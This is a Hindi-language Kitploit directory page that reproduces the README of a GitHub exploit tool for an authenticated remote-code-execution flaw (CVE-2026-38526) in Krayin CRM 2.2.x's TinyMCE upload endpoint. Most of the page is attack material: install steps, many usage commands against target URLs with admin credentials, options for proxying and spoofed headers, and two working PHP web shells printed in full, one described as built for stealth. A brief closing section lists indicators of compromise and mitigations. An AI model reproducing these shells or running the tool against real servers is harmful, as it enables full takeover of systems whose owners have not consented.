Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
KrayinCRM-RCE-Exploit-CVE-2026-38526 — CVE-2026-38526 Krayin CRM v2.2.x के लिए शोषण - TinyMCE फ़ाइल अपलोड बाईपास के माध्यम से प्रमाणित RCE। इसमें इंटरैक्टिव शेल, मल्टी-टाइप पेलोड, ऑटो शेल जनरेशन और सत्यापन शामिल हैं। लेखक: Sudeepa Wanigarathna। केवल अधिकृत परीक्षण के लिए। | Kitploit
उपकरण/GitHubGitHub/cerberusmrxi/krayincrm-rce-exploit-cve-2026-38526
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगशेलकोड जनरेशन
GitHubcerberusmrxi/krayincrm-rce-exploit-cve-2026-38526

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

KrayinCRM-RCE-Exploit-CVE-2026-38526

CVE-2026-38526 Krayin CRM v2.2.x के लिए शोषण - TinyMCE फ़ाइल अपलोड बाईपास के माध्यम से प्रमाणित RCE। इसमें इंटरैक्टिव शेल, मल्टी-टाइप पेलोड, ऑटो शेल जनरेशन और सत्यापन शामिल हैं। लेखक: Sudeepa Wanigarathna। केवल अधिकृत परीक्षण के लिए।

रिपॉजिटरी देखें
3162 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

🔓 Krayin CRM v2.2.x - प्रमाणित रिमोट कोड निष्पादन शोषण

License: MIT CVE-2026-38526

⚠️ केवल अधिकृत सुरक्षा परीक्षण के लिए - अनधिकृत उपयोग अवैध और अनैतिक है।

📋 अवलोकन

यह शोषण उपकरण Krayin CRM संस्करण 2.2.x में खोजी गई एक महत्वपूर्ण प्रमाणित रिमोट कोड निष्पादन (RCE) भेद्यता को प्रदर्शित करता है। यह भेद्यता TinyMCE फ़ाइल अपलोड कार्यक्षमता में मौजूद है, जो प्रमाणित व्यवस्थापकों को सर्वर पर मनमाना PHP कोड अपलोड और निष्पादित करने की अनुमति देती है।

गुणमान
CVE IDCVE-2026-38526
प्रभावित सॉफ्टवेयरKrayin CRM v2.2.x
भेद्यता प्रकारप्रमाणित रिमोट कोड निष्पादन (RCE)
प्रमाणीकरण आवश्यकहाँ (व्यवस्थापक-स्तर पहुंच)
प्रभावपूर्ण सिस्टम समझौता
CVSS स्कोर8.8 (उच्च)

🚨 भेद्यता विवरण

यह भेद्यता TinyMCE फ़ाइल अपलोड एंडपॉइंट (/admin/tinymce/upload) में अपर्याप्त फ़ाइल प्रकार सत्यापन से उत्पन्न होती है। एक प्रमाणित व्यवस्थापक निम्नलिखित कर सकता है:

  • एक PHP फ़ाइल अपलोड करें जो एक छवि MIME प्रकार के रूप में छिपी हो।
  • फ़ाइल एक वेब-सुलभ स्थान पर संग्रहीत की जाती है।
  • हमलावर तब सर्वर पर मनमाना PHP कोड निष्पादित कर सकता है।

प्रभावित संस्करण

  • Krayin CRM 2.2.0
  • Krayin CRM 2.2.1
  • Krayin CRM 2.2.2
  • पैच रिलीज़ से पहले के सभी 2.2.x संस्करण

✨ विशेषताएं

  • एकाधिक शेल प्रकार: बेसिक, एडवांस्ड, मिनिमल, फ़ाइल मैनेजर और कस्टम।
  • इंटरैक्टिव शेल: कमांड इतिहास के साथ पूर्ण टर्मिनल-जैसा इंटरफ़ेस।
  • फ़ाइल अपलोड: शेल के माध्यम से अतिरिक्त फ़ाइलें अपलोड करें।
  • CSRF टोकन निष्कर्षण: CSRF सुरक्षा का स्वचालित संचालन।
  • प्रॉक्सी समर्थन: HTTP/HTTPS प्रॉक्सी के माध्यम से ट्रैफ़िक रूट करें।
  • लचीले आउटपुट प्रारूप: टेक्स्ट, JSON या साइलेंट मोड।
  • पुनः प्रयास तर्क: कनेक्शन विफलता पर स्वचालित पुनः प्रयास।
  • कस्टम हेडर: कस्टम HTTP हेडर के लिए समर्थन।
  • वर्बोज़ मोड: विस्तृत डिबगिंग आउटपुट।
  • SSL समर्थन: वैकल्पिक SSL प्रमाणपत्र सत्यापन।

📦 स्थापना

आवश्यकताएँ

  • bash
  • Python 3.7+
  • pip install httpx beautifulsoup4 colorama

त्वरित स्थापना

git clone https://github.com/CerberusMrXi/KrayinCRM-RCE-Exploit-CVE-2026-38526/.git
cd KrayinCRM-RCE-Exploit-CVE-2026-38526
pip install -r requirements.txt

आवश्यकताएँ फ़ाइल (requirements.txt)

httpx>=0.24.0
beautifulsoup4>=4.12.0
colorama>=0.4.6

🚀 उपयोग

मूल आदेश वाक्यविन्यास

python3 exploit.py -t <TARGET_URL> -u <USERNAME> -p <PASSWORD> [OPTIONS]

आवश्यक पैरामीटर

पैरामीटरविवरण
-t, --targetलक्ष्य URL (जैसे, http://192.168.1.100)
-u, --usernameव्यवस्थापक उपयोगकर्ता नाम या ईमेल
-p, --passwordव्यवस्थापक पासवर्ड

सामान्य उपयोग उदाहरण

# जनरेटेड शेल के साथ बुनियादी शोषण
python3 exploit.py -t http://target.com -u [email protected] -p password

# कस्टम PHP शेल फ़ाइल अपलोड करें
python3 exploit.py -t http://target.com -u [email protected] -p password -f shell.php

# इंटरैक्टिव मोड के साथ एडवांस्ड शेल जनरेट करें
python3 exploit.py -t http://target.com -u [email protected] -p password --shell-type advanced -i

# शोषण के बिना शेल फ़ाइल जनरेट करें
python3 exploit.py -t http://target.com -u [email protected] -p password --generate-only --shell-type advanced -o my_shell.php

# परीक्षण/डिबगिंग के लिए प्रॉक्सी के साथ उपयोग करें
python3 exploit.py -t http://target.com -u [email protected] -p password --proxy http://127.0.0.1:8080

# ऑटोमेशन के लिए JSON आउटपुट
python3 exploit.py -t http://target.com -u [email protected] -p password -f shell.php -o json

# कस्टम टाइमआउट के साथ वर्बोज़ मोड
python3 exploit.py -t http://target.com -u [email protected] -p password -v --timeout 60

# कस्टम User-Agent और हेडर
python3 exploit.py -t http://target.com -u [email protected] -p password --user-agent "CustomUA/1.0" --header "X-Forwarded-For: 127.0.0.1"

🐚 शेल प्रकार

  1. बेसिक शेल (basic) system() फ़ंक्शन के साथ सरल कमांड निष्पादन।

    <?php if(isset($_REQUEST['cmd'])) { system($_REQUEST['cmd']); } ?>
    
  2. एडवांस्ड शेल (advanced) सुविधा-संपन्न शेल जिसमें शामिल हैं:

    • एकाधिक कमांड निष्पादन विधियाँ
    • सुंदर टर्मिनल-जैसा वेब इंटरफ़ेस
    • कमांड इतिहास समर्थन
    • वर्तमान उपयोगकर्ता और होस्टनाम प्रदर्शन
  3. मिनिमल शेल (minimal) चुपके के लिए न्यूनतम पदचिह्न।

    <?php system($_GET["cmd"]); ?>
    
  4. फ़ाइल मैनेजर (file_manager) पूर्ण फ़ाइल प्रबंधन इंटरफ़ेस:

    • फ़ाइल अपलोड
    • फ़ाइल हटाना
    • निर्देशिका निर्माण
    • नेविगेशन
    • फ़ाइल अनुमति दर्शक
  5. कस्टम शेल (custom) -f पैरामीटर के साथ अपनी खुद की PHP शेल फ़ाइल का उपयोग करें।

📝 आउटपुट प्रारूप

टेक्स्ट प्रारूप (डिफ़ॉल्ट)

इंटरैक्टिव उपयोग के लिए मानव-पठनीय रंगीन आउटपुट।

JSON प्रारूप (-o json)

ऑटोमेशन और एकीकरण के लिए मशीन-पठनीय प्रारूप।

{
  "success": true,
  "shell_url": "http://target.com/shell.php",
  "upload_url": "/storage/upload/shell.php",
  "message": "Upload successful",
  "timestamp": 1699123456.789,
  "details": {
    "status_code": 200,
    "response": "..."
  }
}

साइलेंट प्रारूप (-q, --quiet)

त्रुटियों को छोड़कर कोई आउटपुट नहीं। बैच प्रोसेसिंग के लिए उपयोगी।

⚙️ उन्नत विकल्प

विकल्पविवरणडिफ़ॉल्ट
--timeoutसेकंड में अनुरोध टाइमआउट30
--retryपुनः प्रयास प्रयासों की संख्या3
--retry-delayसेकंड में पुनः प्रयासों के बीच देरी2
--user-agentकस्टम User-Agent स्ट्रिंगडिफ़ॉल्ट ब्राउज़र UA
--headerकस्टम HTTP हेडर (कुंजी: मान)कोई नहीं
--verify-sslSSL प्रमाणपत्र सत्यापित करेंFalse
--proxyHTTP/HTTPS प्रॉक्सी URLकोई नहीं
-v, --verboseडिबग आउटपुट सक्षम करेंFalse
-q, --quietसभी आउटपुट दबाएंFalse

कस्टम हेडर उदाहरण

--header "X-Custom-Header: value" --header "User-Agent: CustomUA/1.0"

🔒 पता लगाना और रोकथाम

समझौते के संकेत (IoC)

  • निगरानी के लिए फ़ाइलें:

    • public/storage/upload/ में असामान्य PHP फ़ाइलें
    • डबल एक्सटेंशन वाली फ़ाइलें (जैसे, image.php.jpg)
    • संदिग्ध नामों वाली नई फ़ाइलें
  • जाँचने के लिए लॉग:

    • /admin/tinymce/upload POST अनुरोध
    • असामान्य व्यवस्थापक लॉगिन समय
    • विफल प्रमाणीकरण प्रयास
  • सिस्टम संकेतक:

    • अप्रत्याशित प्रक्रियाएँ चल रही हैं
    • नए क्रॉन जॉब
    • संशोधित सिस्टम फ़ाइलें

रोकथाम के उपाय

  • तत्काल कार्रवाई:

    # पैच किए गए संस्करण में अपडेट करें
    composer update krayin/crm
    
    # अस्थायी रूप से व्यवस्थापक पहुंच अक्षम करें
    # अनावश्यक व्यवस्थापक खाते हटाएं
    # सभी व्यवस्थापक पासवर्ड बदलें
    
  • फ़ाइल अपलोड सख्तीकरण:

    // फ़ाइल प्रकार को केवल एक्सटेंशन से नहीं, बल्कि सामग्री से मान्य करें
    // सामग्री सुरक्षा नीति लागू करें
    // वेब एप्लिकेशन फ़ायरवॉल (WAF) का उपयोग करें
    // फ़ाइल अपलोड स्कैनिंग सक्षम करें
    
टूल डाउनलोड करें